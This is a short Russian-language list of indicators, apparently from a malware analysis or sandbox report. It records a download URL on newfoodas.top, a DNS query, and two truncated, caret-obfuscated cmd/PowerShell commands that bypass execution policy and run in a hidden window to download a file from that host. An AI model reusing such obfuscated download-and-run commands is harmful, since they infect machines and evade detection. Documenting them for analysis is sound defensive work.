Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^WErshElL.^eXe ^-e^xecUT^I^o^nP^o^LI^cY ^ByPAS^S ^-^NopRO^fI^L^e -^W^I^nDOwst^yL^E ^HI^D^De^n (^new-o^bJ^E^ct^ sy^s^T^eM.NET^.webcl^ieNT^).D^OwnLOADfi^LE('http://newfoodas.top/r...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "p^O^WErshElL.^eXe ^-e^xecUT^I^o^nP^o^LI^cY ^ByPAS^S ^-^NopRO^fI^L^e -^W^I^nDOwst^yL^E ^HI^D^De^n (^new-o^bJ^E^ct^ sy^s^T^eM.NET^.webcl^ieNT^).D^OwnLOADfi^LE('http://newfoodas.top/r...' (со скрытым окном)